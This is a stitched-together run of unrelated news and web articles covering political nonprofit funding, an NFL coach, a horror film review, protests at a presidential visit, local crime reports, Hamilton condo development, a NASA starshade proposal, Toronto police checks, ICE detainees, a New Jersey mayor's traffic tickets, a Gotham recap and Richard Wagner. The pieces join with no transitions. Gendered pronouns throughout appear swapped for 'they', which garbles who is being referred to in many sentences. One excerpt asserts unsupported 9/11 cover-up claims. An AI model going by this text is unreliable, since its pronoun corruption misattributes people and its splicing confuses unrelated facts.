Unlike many others politically nonprofits, none of the money fueling VoteVets in 2014 came from donors giving seven-figure checks. In fact, the group has received just one million-dollar contribution since 2010, the year when it brought in more than 82 percent of its $10.8 million haul from just three large donors. Some of those million-plus contributions, at the time, came from other dark money nonprofits, like the Alliance for Climate Protection and Partnership Action Fund, both social welfare organizations that support liberal policies.
Even as VoteVets' large contributions have tapered off, it appears that most of its donors are liberal nonprofits or unions, many of which are involved in some aspect of electoral persuasion. One of its largest known donors over the last few years has been America Votes, another social welfare organization that is the self-described “coordination hub of the progressive community” and has deep ties to liberal political operatives. It has given $775,000 to Vote Vets since 2011, including $50,000 in 2014.
Vote Vets also provided $50,000 to the (c)(4) arm of American Bridge 21st Century, a group now run by pro-Clinton operative David Brock that specializes in churning out opposition research on Republican candidates.
VoteVets is also a favorite of environmental and union groups. It received $1.7 from the Sierra Club and the NRDC Action Fund in its banner year of 2010, and even in recent years its ads have continued to have an environmental theme, often focusing on mining or ethanol standards — which, in Iowa, were used to lay the groundwork for Sen. Bruce Braley's (D-Iowa) failed re-election battle.
But while no single donor appears to have furnished VoteVets with seven-figure-plus checks lately, it has been on the receiving end of millions in union funds over the years — including more than $2 million in 2013 and 2014 alone. According to Department of Labor data, six different unions fueled VoteVets in recent years. Those contributions from labor group like the United Brotherhood of Carpenters and the AFL-CIO account for nearly a fifth of VoteVets' revenue over two years, and — giving lie to the idea that VoteVets is meant to be anything but a political entity — almost all of the unions described the purpose of the contributions as “political activities.”
For permission to reprint for commercial uses, such as textbooks, contact the Center: Feel free to distribute or cite this material, but please credit the Center for Responsive Politics.For permission to reprint for commercial uses, such as textbooks, contact the Center: [email protected]
Arizona Cardinals coach Bruce Arians had their first big moment of criticism for their team in training camp. It was directed toward “the young guys” on the team. That includes draft picks, undrafted rookies and players just entering the league in the last couple of years.
“They're loafing, especially in special teams where they're going to make the team,” they told reporters on Friday, according to Arizona Sports' Craig Grialou. “You turn that tape on and they ain't going fast enough to make this team.”
They said it has been addressed in the locker room and the players should have understood.
“You'll either big flip burgers and bagging groceries or you might be here,” they explained the message was. “That's your choice in about three weeks because if you practice like you did you ain't getting in the game Friday night.”
Arizona's preseason opener is Friday, Aug 12 against the Oakland Raiders.
Arian has emphasized all offseason how talented this team is. Even the draft picks are not a lock to make the roster because of the depth at almost all positions. Special teams play is key, especially for younger players.
If the trend continues, we might be able to figure out who those players were. They won't play on Friday. Keep an eye on special teams drills to see if the speed picks up in practice.
It seems unlikely right now but after watching Creep, when you hear the name Peachfuzz again your heart will stop in terror.
Creep is a super low-budget, independent horror film made by first-time director Patrick Brice, and it stars Brice themselves along with co-writer Mark Duplass, who you might know from a succession of lo-fi indie comedies and sitcom The League. By the end of your experience you'll learn what a deeply unsettling, black-hearted, mean-spirited little film this is, but you'll be surprised at how genuinely hilarious it is too. But then you may also have to be an unbalanced creepo yourself to realise that.
It begins simply enough with Aaron (Patrick Brice) pulling up to a house and encountering the warm-spirited if overly personal space invading Josef (Duplass). Aaron is a freelance filmmaker who has answered Josef's Craigslist ad. Josef is terminally ill and wants to film a series of videos for the unborn son they will never see get to see. It's a bit like the Michael Keaton movie My Life, only way more fucked up.
There are many signs that all might not be what it seems from very early on, but the major clue occurs when Josef insists on Aaron filming them taking a bath. This is a tortuously uncomfortable scene where Josef pretends to bathe their imaginary child. It seems to take forever and you know you should be feeling nothing but sympathy and sadness for the man, but instead you're constantly fighting the urge to scream “get away from this creepy weirdo now!”
And this is long before Peachfuzz comes out. Oh Peachfuzz…
The bath-tub scene is indicative of how the rest of the film plays out. It's a twisty-turning, blackly-comic two-hander that illicits as much pathos as it does squirm inducing agony and ultimately terror. Creep doesn't bring in any other characters, it just relies on the performances of these two considerably brave actors to ratchet up the tension to tortuous heights. Duplass in particular is a triumph, managing to remain bizarrely sympathetic despite every sign-post telling you differently.
It's thanks to Duplass that Creep more than any other film before it, truly manages to be the perfect comedy-horror. It works both as a nauseatingly terrifying experience, and a wonderfully comic character study. It's like an episode of I'm Alan Partridge. It plays within the same cringe-inducing space, where you fear to watch what's going to happen next but the character is so fully-rounded and the comedy so perfectly timed that you can't look away. It just so happens that Creep takes one extra unpleasant turn than the other.
For more spine-chilling thrills to watch over Halloween, check out our complete 31 days of horror movies list.
Author: Christopher Ratcliff Date: 2015-10-03 Title: Creep Rating: 4
Hundreds of protesters greeted President Obama's motorcade in Roseburg, Oregon, Friday as a group called “Defend Roseburg” held signs and waved banners while others silently turned their backs as the motorcade rolled by.
Obama came to Roseburg, the White House said, to mourn with family members of the nine victims shot dead by a gunman at Umqua Community College on Oct. 1.
“We're going to have to come together as a nation to deal with this issue,” Obama said. “But today is about the families.”
In fact Obama's Democrat loyalists in the Senate led by Sen. Richard Blumenthal, D-Conn., have already readied several gun control bills. If those don't pass, the White House said Friday the president is considering taking unilateral action by executive order to create new federal background checks for firearms purchases, ABC News reported.
Many protesters in Roseburg said they were not in a mood to welcome a president who so quickly and callously politicized a tragedy. Some came with their guns to make their point. All were peaceful.
“He should stay away,” Gary Shambling, 66, of Winston, whose 1935 Harvester International pickup was parked Friday morning along the side of Aviation Drive, told their local newspaper, the Register-Guard. Their truck had a large “No Bama” sign in red letters.
“He made it very plain, 15 minutes after the shooting happened,” Shambling said. “He politicized it. The bodies weren't even cold.”
Others carried signs supporting their local sheriff, who'd said earlier that they didn't believe Obama should come to the town after making politicized comments about gun control.
Others protesters held signs saying “Obama Free Zone” and “Go Away” and “Go Home, You're Not Wanted Here” as drivers honk their horns passing by. Other signs include “Prayers Not Politics” and “In Memory of the Fallen” and “#Roseburg Strong.”
Watch Fox News coverage of today's protests in Oregon:
More than 8,000 people “liked” a Facebook page dubbed “Defend Roseburg – Deny Barack Obama.”
The Facebook page contained the following message:
“The anointed one their majesty king Obama and the White House have announced a Friday arrival in Roseburg, Oregon in the wake of Oct 1st's horrific tragedy at UCC,” the Facebook page reads. “Polarizing as usual, Mr. 0bama has insisted on politicizing the event as a conduit for increased executive orders on gun control via means of their pen, and their phone. This blatant disrespect of the victims families, the community and the town of Roseburg, Mr. Obama's administration is flying not just the 747 that is airforce one to Oregon, but a three helicopter team of Sikorsky's that make up HMX-1, known as Marine one to travel to Roseburg at the taxpayers expense. We need a lot of people. Please come show your support for Roseburg, not the little man who has no respect for the Constitution.”
Young Conservatives posted a statement on its website that referred to the Roseburg protests as “truly a beautiful sight to see patriots standing up for their Second Amendment rights to protect life, liberty and property.”
The statement continued:
“I can't think of a better way to send a message than what these fine patriots did by protesting against a lawless president who seeks to not only take away their right to protect themselves, but who also ignores the Constitution and tries to usurp power away from Congress and ultimately, the people. “Obama is all about the progressive agenda which they and other radical leftists believe is the solution to all that ails humankind despite history and common sense testifying otherwise. “This is why he's always ready to politicize a tragedy and instead of offering prayers and kind words meant to heal, they immediately pushes the agenda, which is exactly what they did with this shooting. “Americans are clearly growing tired of it.”
One protester posted a photo on Twitter with the comment “‘Defend Roseburg' planning to protest POTUS at 2 locations in Roseburg over #guncontrol and #UCCShooting.”
That led to a counter tweet by a man who said “What exactly are they defending? The right to be ignorant racists?”
According to reports put out by a pool of White House travel reporters, Obama's motorcade traveled from the local airport to Roseburg High School where they met with families of the deceased. The ride took about 10-15 minutes and they got to the school around 12:45 p.m. There were several hundred people clustered outside the gate to the airport and in the parking lot of a nearby Home Depot.
Many of the people were snapping photos with their phones. But others carried signs at this location similar to those lining the highway. About half of the people stationed at this location welcomed Obama to the town. “The other half were negative or seemed to be protesting their calls action to tighten the nation's gun laws,” the pool report said.
Some of the signs visible from the motorcade:
thepeoplesvoice.org, December 11th, 2011
By Susan Lindauer
Some things are unforgivable in a democracy. A bill moving through Congress, authorizing the military to imprison American citizens indefinitely, without a trial or hearing, ranks right at the top of that list.
I know—I lived through it on the Patriot Act. When Congress decided to squelch the truth about the CIA's advance warnings about 9/11 and the existence of a comprehensive peace option with Iraq, as the CIA's chief Asset covering Iraq, I became an overnight threat. To protect their cover-up scheme, I got locked in federal prison inside Carswell Air Force Base, while the Justice Department battled to detain me “indefinitely” up to 10 years, without a hearing or guilty plea. Worst yet, they demanded the right to forcibly drug me with Haldol, Ativan and Prozac, in a violent effort to chemically lobotomize the truth about 9/11 and Iraqi Pre-War Intelligence.
Read rest of article.
See Also:
Extreme Prejudice: The Terrifying Story of the Patriot Act and the Cover Ups of 9/11 and Iraq
ADELANTO >> Sheriff's investigators arrested an Adelanto father early Friday on suspicion of involuntary manslaughter after they accidentally shot and killed their 7-year-old son, officials said.
Julio Cervantez Sr., 40, was booked into the High Desert Detention Center around 3:30 a.m. Friday after San Bernardino County sheriff's homicide detectives concluded they accidentally shot and killed their son, Daniel.
Adelanto deputies received a 9-1-1 call just before 5 p.m. for an accidental shooting at a home in the 18000 block of Bellflower Street.
Paramedics drove Daniel to Victor Valley Global Medical Center in Victorville, where they were later pronounced dead.
Through an investigation, detectives determined Daniel had accidently been shot by their father, according to a sheriff's news release.
The investigation is ongoing, and anyone with information is asked to contact sheriff's Detective Scott Stafford or sheriff's Sgt. Robert Warrick at 909-387-3589.
Callers wishing to remain anonymous call the WeTip Hotline at 800-78-CRIME (27463) or may leave information on the WeTip website at www.wetip.com.
Steve Kulakowsky takes satisfaction in standing on the roof of Witton Lofts and knowing he's helping change the landscape of downtown Hamilton.
The president of development firm Core Urban Inc. and a lifelong city resident, Kulakowsky has seen Hamilton endure good times and bad. He's seen industries come and go. He's seen condo projects started and abandoned.
Now, there are no less than nine active condo projects downtown, resulting in what the City of Hamilton estimates to be about 300 new multi-residential housing starts in the works. Kulakowsky is pleased to be in charge of 36 of them as developer of Witton Lofts.
"It's a proud moment," they said, looking out at the west harbour on one side and the downtown skyline on the other.
"Even though it's only 36 units, [the project] represents a shift to the waterfront and a shift back to downtown."
Kulakowsky is the first to admit that Witton Lofts was a risk. It's at 50 Murray St. in a traditionally rough neighbourhood that has been stagnant for years.
Witton Lofts is in the 88-year-old former McIlwriath School. Recently, it was home to Mission Services shelter kitchen services.
"It's a complete 180 for the area," Kulakowsky said.
Drastic change
Kulakowsky's project is just one of many. Perhaps the largest downtown residential development underway is Bella Towers, a two-phase project from Vrancor on 150 Main St. W.
Phase 1 will have 135 condo units. Phase 2 will have 277. A third phase with 275 units at 20 George St. is in the design stage. The project is expected to create 687 condo units over the next three years.
The Vrancor project also includes two hotels — the 129-room Staybridge Suites at 20 Caroline St. S. and the 182-room Homewood Suites at 40 Bay St. S.
Other projects include:
Stinson School Lofts (71 units) is at 200 Stinson St.
Hamilton Grand (90 units plus office and retail space) is at 64 Main St. E.
Urban West Condos, with its 33 units at 427 Aberdeen Ave. W., will open this fall.
Acclamation Lofts will bring 60 units to 185 James St. N., planned to open in 2014.
City Square 1 and 2 on the former Thistle Club property will see another 175 units, with a third phase in the planning stages.
It all seems like a lot of expensive optimism, but it's justified, said Derek Doyle, a Hamilton native and real estate agent who does some business downtown. Doyle bought one condo for themselves in the Witton Lofts and a second condo as an investment.
Downtown revitalization still has a long way to go, they said. But when it comes to the real estate market, "things have changed drastically."
"A lot more people are interested down here, so as a result, we're seeing prices go up. It's good for people who got in early and it's good for people still interested."
Steady, stable growth
The core hit rock bottom in recent years, Doyle said, but real estate and buyer attitudes are gaining momentum.
Downtown is transitioning, which is what it needed to do. It's happening little by little.
"I think as we see those prices continue to go up, we'll see more interest from people knowing it's secure."
Cameron Nolan, president of the Realtors Association of Hamilton, has watched the upward trend in prices throughout Hamilton. He's also seen more listings and sales in the downtown core in the last two years.
"It's not happening wildly," they said. "It's steady. It's stable and it's comfortable."
Downtown real estate attracts a different market from those looking for single-family homes on the Mountain.
Condo buyers tend to be first-time buyers or older residents who want to be within walking distance from entertainment venues and other amenities, Nolan said. Commuters also are drawn to the proximity of the GO train.
More people living downtown will bring the perception that the area is safe, which makes it more attractive, Nolan said.
City needs to help
Jeff Paikin, developer of the City Square and Urban West projects, is another Hamilton native who sees a shift in people wanting to live downtown.
Sales for City Square have been brisker than anticipated, Paikin said.
People moved away from downtown because there were affordable homes in the southwest area of Hamilton. But the more people moved, they said, the more expensive housing got in that area and now it's too expensive for many to afford. That's sending more first-time buyers downtown.
"Downtown is transitioning, which is what it needed to do," they said. "It's happening little by little."
The market could easily become saturated.
It's a "delicate balance" right now, they said. To continue to spur development, the city needs to keep approval costs for developers low and turn around applications quickly.
"Toronto has 138 cranes building condos right now," they said. "Hamilton has two or three. It's a very sensitive price scale."
Witton Lofts will open in September. This summer, the glass will be enclosed and the old school structure will merge with the three levels Core Urban has added.
Kulakowsky sees it as a harbinger of things to come.
"Downtown is absolutely turning around," they said. "There are indicators all over the place, specifically people wanting to live back in the city."
This story is part of a four-part series on the downtown revitalization that continues until Thursday. Articles published earlier this week include Downtown making slow, sure gains and Hamilton artists leading downtown's rebirth.
Some interesting things are going on down here … that might just affect how we see what's going on out there.
Two recent reports from two Science and Technology Definition Teams from NASA's astrophysics division have detailed proposals to detect extrasolar planets orbiting nearby stars. One report studied a concept based on a telescope with an internal coronagraph capable of generating the ultra-high contrast images needed for planet detection. The other evaluated the feasibility of flying a pair of spacecraft in formation — a telescope and an external starshade. I worked on this report (and talked about said starshade in my talk at TED2014, The flower-shaped starshade that might help us detect Earth-like planets). And while it's still far from certain that such a mission will happen, the thinking now is that we could add the starshade spacecraft onto an existing space telescope mission, which is potentially a Very. Big. Deal.
Let me back up.
Every ten years, the National Academy of Sciences forms a committee to determine what should be done in astronomy over the next decade. In 2010, it named the Wide-Field Infrared Survey Telescope (WFIRST) as its top priority. This observatory was to use a 1.5 meter telescope and would work on important questions of astronomy, such as trying to determine the nature of dark energy or performing a statistical census of planetary systems.
Anything that introduces the possibility that exoplanets might be observed decades ahead of schedule is promising, exciting, and a reminder of why astronomers do the work they do.
For many reasons, including money and delays on important related technology — including the telescope itself — WFIRST never really went anywhere … and it looked as if we might have no major space telescope this decade after all, which would obviously be somewhat disheartening.
But then we got a potential break. The National Reconnaisance Office donated two unused space telescopes to NASA. Not just any old telescopes but two 2.4 meter, Hubble-sized telescopes. This revived excitement about the WFIRST mission and, because of their larger size, enabled the addition of an instrument to image exoplanets. Now, starshades don't work in Earth's orbit, so the WFIRST mission would need to be slightly redesigned to work in deep space, but the hope is that the benefits would outweigh the additional costs and time. Certainly, if we adapted WFIRST to add a starshade, we'd have the potential to image and characterize an Earthlike planet in the “habitable zone” of one of our nearest neighbor stars. (The habitable zone is the orbital region around a star where liquid water can support life — it is not too close to the star that water boils away and not too far away from it that water freezes.) Not only that, but a starshade with WFIRST would allow us to test this promising technology in space.
So now the question that astronomers at NASA have to answer is whether and how to do this. No decisions have been made yet; NASA assessors will spend months reviewing and assessing the reports to figure out what to do next. But anything that introduces the possibility that the starshade might be used and exoplanets, particularly ExoEarths in the habitable zone, might be observed decades ahead of schedule is promising, exciting, and a reminder of why astronomers do the work they do.
Featured image courtesy NASA/Ames/JPL-Caltech.
The Toronto Police Services Board is grappling with how to manage the 200 new requests for checks received each day, contributing to a backlog that peaked at almost 17,000 requests last year. Waiting times for a check can stretch for months.
A “catastrophic” backlog in Toronto police background checks for students, health professionals and other workers could grow worse if the RCMP makes fingerprinting a mandatory part of the process.
Police checks meant to uncover a potential criminal record are mandatory in a variety of workplaces. Last year, Toronto police received more than 108,000 requests for the two types of checks they provide.
At stake are timely job acceptance and school placements for thousands of applicants every year.
The first kind is called a clearance letter, which shows a person's criminal record and can be checked by any police force using a database called the Canadian Police Information Centre (CPIC).
The second type, called a “vulnerable sector screening” or VSS, is a more in-depth process and must be done by the police force where the person lives. Police use an applicant's name, gender and birthdate to check against multiple criminal databases.
In a case where the gender and birthdate match with someone on a database, such as the registry for pardoned sex offenders, the RCMP requires fingerprints to confirm the applicant's identity. That requirement is the result of a 2010 policy change aimed at capturing pardoned sex offenders who make an unreported name change.
But the RCMP may soon require everyone who needs a VSS check to submit fingerprints — which could have a “severe impact” on the system, according to a report from Chief Bill Blair to the board.
And the system could continue to be flooded with requests after future legislation changes that will require all Ontario health professionals — and possibly driving instructors as well — to get VSS checks.
At a board meeting Thursday, George Brown College student Chris Khan told members they were forced to withdraw from the personal support worker program in 2013 and was delayed for a year when they couldn't get their VSS check in time for a placement.
Khan said they didn't know the check expired every year and learned it needed to be renewed only a month before the placement was set to begin.
“I realized it would take me four to six months to receive my clearance. As a result, my spot in my program of study was at risk and my graduation was on the line,” Khan told the board.
Jason Powell, dean of the school of health sciences at Humber College, said the college is “extremely concerned” about the delays and potential loss of opportunities for students.
“That, to me, is catastrophic,” they said.
For employment fields that require a valid VSS issued within six months, such as long-term care, some checks have expired by the time they are needed, Powell said, creating an “impossible scenario.”
They said police resources have not met increased demand for checks as more sectors begin requiring them and school enrollment continues to rise.
And they questioned why 17-year-olds applying for public-sector programs need police checks when they aren't old enough to have criminal records. Similarly, international students required to get checks in Canada are almost guaranteed to come back with blank results.
The overall effect, Powell said, is fewer resources in the community such as nurses and social service workers. “Then I think we've got a big national problem.”
Though the RCMP have been accused of contributing to the overall backlog, other police services in the GTA have reported much shorter wait times.
York Regional Police told the Star they could complete a VSS check in two weeks, while Peel Regional Police promised to do it on the spot.
For Toronto police, the current wait time now stands at eight weeks.
In a report to the board on last week's agenda, Chief Bill Blair said a redeployment of staff reduced the VSS request backlog of nearly 17,000 applicants to 4,750, but the service had since received 7,206 new applications.
Blair said the current staffing of 11 to 14 employees dedicated to VSS checks throughout the week was “interim” and had an impact on other service areas because staff were shifted away from their usual tasks.
Councillor Mike Del Grande — a police board member who has spoken passionately on this issue since their own daughter waited three months to get a check for a placement — said the reduction in wait times is “not good enough.”
“Their lives are jeopardized by this piece of paper,” they told the board. “Whatever rabbits need to be pulled out of a hat, it needs to be done.”
Former mayor John Sewell, who heads the Toronto Police Accountability Coalition and has previously complained to the board about delays, said the system for checks is “beyond crisis.”
“This is creating work for police,” Sewell said. “This is not helping society.”
As they searched for solutions, board members moved to require the city, which currently does not pay for VSS checks, to begin paying those costs, starting in June. The money recouped will be put toward improving the overall system.
The board suggested in January that a two-week maximum be the standard wait time.
The board also asked Blair to look at the feasibility of a tiered pay system, much like passport applications, where checks could be expedited at a higher fee. They asked Blair to report back in April with options to prevent another big backlog.
The VSS check currently costs $50 for employment applications and $15 for volunteer requests.
With files from Patty Winsa
The American Civil Liberties Union is alleging that its clients are facing “a series of abuses” at the hands of Immigration and Customs Enforcement (ICE), purportedly due to the detainees' involvement in an ACLU class-action lawsuit.
In a blog post on Thursday, the ACLU's Rebecca Wallace, Sara Neel and Arash Jahanian explain how detained Iraqi men, clients of the ACLU, “have been singled out and denied food, water, and access to the restroom.”
“One man, who came to the United States as a refugee in 1976, reflected that if they go back to Iraq, they will be tortured and killed. Still, they feel that their experiences at the hands of ICE are ‘a different way of torture,' ” the blog states. “ICE guards in Arizona and Colorado have openly pressured Iraqi nationals to sign away their right to fight their immigration cases. Some guards told the detainees that their situations were hopeless and urged them to sign forms agreeing to voluntary deportation, without counsel present.”
The “brave men” the ACLU cites in the blog are participants in a class-action lawsuit against the Trump administration.
“In March, Trump struck a deal with the Iraqi government: If that government accepted individuals deported from the United States, they would omit Iraq from the list of six Muslim-majority countries banned from traveling to the U.S.,” the ACLU notes. “In May, ICE began making mass arrests of Iraqis with open removal orders with the intent to deport them immediately.”
But in July, the ACLU's Iraqi clients secured a stay of this order from a federal judge.
“The judge said the court needed additional time to determine whether the court has jurisdiction over the case in the first place, according to court documents,” CNN explains. It continues:
Shortly after the initial stay was granted, the ACLU asked to expand the class-action lawsuit to cover all Iraqi nationals in the US with final orders of removal for deportation. The judge granted their request, expanding the temporary stay on June 26 to cover this group of 1,444 Iraqi nationals on June 26. Eighty-five of them face deportation when the stay is lifted, according to court documents. While the stay is in place, Iraqi nationals, both those being held in detention centers and those still going about their normal lives but who have final orders of removal, are able to take their case before an immigration court judge and argue why they believe they should be allowed to stay in the U.S.
Many of those detained are Chaldean Christians, a religious and ethnic minority, as well as Iraqi Kurds. Both groups would face extreme persecution if sent back to Iraq. On top of this, all of the men fear violence from Islamic State because they have now spent time living in the United States.
“Since the court's ruling, ICE appears to have ramped up its efforts to make the lives of Iraqis in custody so unbearable that they will ‘voluntarily' sign away their rights to reopen their immigration cases or pursue asylum,” the ACLU writes. “It is tragic that these individuals, who fear persecution in Iraq because of their religion and connection to America, are now being persecuted by agents of the United States government.”
At a court hearing in Detroit on Thursday, lawyers for the detained Iraqis asked Judge Mark Goldsmith to order ICE to stop threatening the detainees. Miriam Aukerman, a lawyer with the ACLU of Michigan, told Goldsmith that Iraqi detainees are feeling pressured “to give up their rights.”
“In a status report filed with the court, attorneys wrote of what they called ‘coercive effects of detention.' It says that some of the detainees are being ‘abused or harassed … told that they will suffer in prolonged detention if they get a lawyer,' ” the Detroit Free Press reports. “ ‘ICE employees, contractors, and agents … are misrepresenting this litigation and the detainees' rights' when interacting with the Iraqi detainees, the report said.”
This is not the first time ICE has been accused of psychologically and physically abusing detainees. Earlier this week the ACLU reported that ICE has asked for the destruction of “11 kinds of records, including those related to sexual assaults, solitary confinement and even deaths of people in its custody.”
“Many of the records that ICE proposes for destruction offer proof of the mistreatment endured by people in detention,” the ACLU says. “Given the Trump administration's plans to increase the size and scope of the system substantially, it is all the more disturbing that the agency wants to reduce transparency and accountability.”
HILLSIDE -- A judge has overturned convictions on three traffic summonses the Hillside police union president gave to the same township's mayor last year amid a political battle over who would serve as the police chief.
Superior Court Judge Frederic McDaniel on Oct. 30 ruled Mayor Angela Garretson was not guilty of charges that they disregarded a police officer's hand signals, improperly passed other cars stopped at a construction work site and used a cell phone while driving.
Garretson's lawyers have said police Officer Matthew Casterline issued their five tickets, two of which previously were thrown out, as political retribution for their attempts to demote then-Chief Louis Panarese.
"Whether or not the officer held a substantial grudge against the mayor for political reasons does not necessarily mean that they were not justified in issuing a summons," McDaniel wrote in their decision. "It might mean that they relished the opportunity to do so out of their contempt for her, which would indeed be unprofessional and even unbecoming a sworn law enforcement officer."
McDaniel wrote that Casterline previously had complained about the mayor enforcing a township ordinance against him, which was essentially the same thing they did in giving Garretson the tickets. The decision to accuse Garretson of harassment for enforcing a rule affects Casterline's credibility, the judge wrote.
They also said prosecutors had not proven beyond a reasonable doubt that Garretson had committed the violations.
"While it is perhaps quite shameful that the parties have acted in ways detrimental to the government and community they serve, it has little bearing on the guilt or innocence of the defendant," McDaniel wrote.
The summonses came after a July 12, 2015, incident in which Casterline was working an overtime assignment directing traffic around a construction site on Hillside Avenue, near Hilldale Place.
Casterline testified at trial in Union Township Municipal Court, where the case was transferred to avoid a conflict of interest, that Garretson drove their SUV around cars stopped for the construction work, ignored their hand signals to stop and then texted on their cell phone. The two spoke briefly, and Casterline issued the summonses the next day.
Municipal Court Judge Kelly A. Waters in March found Garretson guilty of disregarding an officer's hand signals, improperly passing the other cars and using a cellphone. Waters found Garretson not guilty of a charge of obstructing traffic, while a charge of driving through a safety zone previously had been dismissed.
Oleg Nekritin, one of two attorneys who represented Garretson, on Thursday said Garretson will not have to pay a $717 penalty imposed by Waters because the convictions were overturned. They also will not receive any points on their drivers license, Nekritin said.
Another attorney for Garretson, Robert De Groot, said Casterline had brought the traffic complaints against the mayor as an "opportunity to be the tail wagging the dog."
"They get to go in the municipal court and make baseless allegations against them by witnesses determined to be not credible and attempt to show the mayor that the police also have power and authority," De Groot said in a statement.
Garretson said the decision on appeal completely vindicated them and they were grateful for the support of residents who encouraged them to stand up to "the cycle of bullying" from Casterline and Panarese.
"The Superior Court judge relied on overwhelmingly credible portions of my testimony in their decision to overturn each of the tickets issued by Officer Casterline," Garretson said in a statement. "My credible testimony was bolstered by the professional manner in which I handled this matter in spite of the officer's intimidation tactics and the intense media scrutiny that I endured."
Garretson added that the result of their case would support reforms they brought to the police department by promoting Vincent Ricciardi, formerly a lieutenant, to the position of chief.
Panarese's lawyer did not immediately respond to a request for comment on Garretson's remarks.
Panarese retired in August amid an ongoing legal controversy about whether they or Ricciardi would serve as the chief. Panarese and police Capt. Nicola Lomonte are separately suing Hillside, alleging they were illegally passed over for the department's top role.
Township attorney Farrah Irving declined to comment on the pending litigation.
Ricciardi, the police chief, said the department would conduct an internal affairs investigation around Casterline's issuance of the summonses.
A spokesperson for the Union County Prosecutor's Office, which prosecuted the appeal, said their office respected McDaniel's decision. A woman who answered the phone at Union Municipal Court said they had not yet received official word of the decision and could not comment on it.
Marisa Iati may be reached at miati@njadvancemedia.com. Follow them on Twitter @Marisa_Iati or on Facebook here. Find NJ.com on Facebook.
Have a tip? Tell us. nj.com/tips
If you haven't seen the Season 3 premiere of Gotham, click here for a recap as there will be spoilers below.
Now we don't have to wait very long before we know where the assassin has taken Bruce and it is back to the court of owls to meet a mysterious masked woman. They unmask themselves and we learn that their name is Kathryn (Leslie Hendrix) and they are a representative for the court of owls. We also learn that Bruce's original threat to the Wayne Enterprises board members was a bluff and that they didn't have as much information as they were letting on. In order to ensure their survival, Bruce hands them Wayne Enterprises but that is not enough for them. In addition to this, Bruce must agree to not look into them and their many conspiracies which included Hugh Strange and Indian Hill and also the murder of their parents.
Vicky Vale visits Jim and informs them that they have valuable information about Fish Mooney. Jim questions their motives in doing this and they tell them that they just wants the story. In order to get this information, Jim and Vicki must make contact with their source who happens to be Selina Kyle. On the way, they run into Barbara and being their crazy self, they offer to give them information in exchange for a kiss that never came. They got the information anyway, leading Vicki to betray Jim by instead giving the information to the GCPD.
We now see Ivy who has now washed up on a shore near a construction site and for some reason is now older and now played by Maggie Geha. They meet a man who offers to help them Now we see Vale helping the Bullock and the GCPD, leading to a building where Fish and their fellow goons are hiding out. The goons are able to dispose of the cops quite handily thanks to their various powers which then allows Fish to escape. Penguin is giving a speech in front of cameras in the hopes of riling up an angry mob to go after Fish and their monster goons.
Bruce is back in the mansion and is woken up by Alfred who woke up from their beating not that much earlier. They tell them what happened but Alfred reminds them who he's dealing with and just because they live to their end of the bargain, doesn't mean they will. Gordon finds Mrs. Peabody's mummified body, leading them to the realization that they were unable to help them so they have now decided to go after Hugo Strange.
As Bullock is leaving the scene, they are abducted by a few of Fish's goons and they bring them to them They use their special power on them to get them to bring them to where Strange is being kept which was a government scientific centre of some sort. Ivy is now in this man's house. After they call them beautiful, they begin to open up to them by telling them their life story and how they came to be alone. They soon throws a plant in the garbage which upset them
Worried about Bullock, Gordon and Fox confront Barnes who is not happy about this new turn of events.  They are skeptical at first but since only they and Bullock know where Strange is, they agree to take Gordon to where Strange is being kept. Fish and their goons are there first and they infiltrate the facility. They quickly find Strange and learns that they cannot fix them The police now arrive and Fish decides to take Bullock, who is no longer under their control, as a hostage. The press and Vale are there not long after.
Fish threatens Strange in their usual non-threatening way but they are interrupted by an angry mob led by Penguin before they have the chance to do anything to him. Gordon uses this as a distraction to find a way into the facility.  They are then captured and brought to Fish. They exchange a way out for Fish as long as they give them Bullock. They agree but Gordon double-crosses them and promises them to Penguin as soon as they escape. They use the onrushing mob as a distraction to get out. Fish and Strange are then held at gunpoint by Penguin. In order to try and save herself, Fish tells Penguin some sap story about how they saved them once before because they were one of their proudest creations. Of course they stupidly fall for it and lets them go.
Now Ivy is all glammed up and ready to leave this guy's house when the camera pans down and we see that the good samaritan is dead. Since Bruce has nothing to do anymore, they and Alfred discuss what they will do with all this extra time. Alfred suggests dance lessons. Shortly after, they hear some strange noise which ends up being clone Bruce. Vale confronts Gordon about what happened as they know that Gordon made a deal to let Fish escape and that Penguin also let them escape.  They are confused as to why they would ever do that. It was inevitable but they finally made out. Things will soon get awkward as the episode ends with Lee who is now in Gotham
Overall, the Bruce storyline was kind of interesting and the Ivy change may lead to something more for the character but the whole story didn't really move forward which was kind of frustrating. This was the root of my relationship with this show because it moves so slowly.
Score: 6/10
If you liked this, please read my other reviews here and don't forget to follow me on Twitter, follow me on Instagram, and also like me on Facebook.
Advertisements
Share this: Twitter
Facebook
Reddit
StumbleUpon
Tumblr
Pinterest
LinkedIn
Email
Print
Pocket
Telegram
WhatsApp
Skype
Like this: Like Loading...
A 75-year-old man has been charged with shooting their wife to death at their San Pedro house, prosecutors said Tuesday.
George Matsumoto allegedly killed their 72-year-old wife, Mary, whose body was found Jan. 14 at their house in the 800 block of West 11th Street.
Police discovered their body when a family member asked officers to check on them after not hearing from them for several days.
“When authorities arrived at the victim's home, they found the defendant inside the location along with Mary Matsumoto's body,” Deputy District Attorney Kelly Kelley said in a statement.
Matsumoto is charged with one count of murder with a special allegation that they used a gun that caused great bodily injury and death. They pleaded not guilty Tuesday in Long Beach Superior Court.
Matsumoto is being held on $2 million bail and is scheduled to return to court March 4. If convicted, they face up to 50 years to life in state prison.
“Egoism, overweening ambition, opportunism, deceit, spite, jealousy, arrogance, philandering, profligacy and racism.” Such is the “formidable catalogue” of personal attributes, according to scholar Barry Millington, of which Richard Wagner stands accused.
Certainly there are few cultural figures as divisive as the composer, polemicist, dramatist and conductor born in Leipzig on 22 May 1813. Yet nobody, whatever their thoughts on the man, can overstate Wagner's significance to music. The extremity and the force of their genius altered forever the course of the art form in a way that only a handful of others – Bach, Beethoven, Schoenberg – have ever done.
Wagner's output is already recognisable to millions who have no interest in classical music. This year it will be harder than ever to avoid not just the Ride of the Valkyries and the Bridal March, but everything else besides. From Sydney to London, New York to Berlin, Melbourne to Seattle, Milan to Bayreuth, their work – which is not exactly neglected in other years – is at the forefront of programming everywhere.
Brand new complete Ring Cycles, gala concerts, debates, discussions and documentaries are all scheduled, many with stellar casts. And operas such as Parsifal, the Mastersingers of Nuremberg, The Flying Dutchman and Lohengrin will be presented countless times – along with the soaring five-hour epic Tristan and Isolde, whose evocation of sex, love and infatuation was so radical that Wagner once told their muse Mathilde Wesendonck that if the work were ever to be “performed well” they feared “it would be banned.”
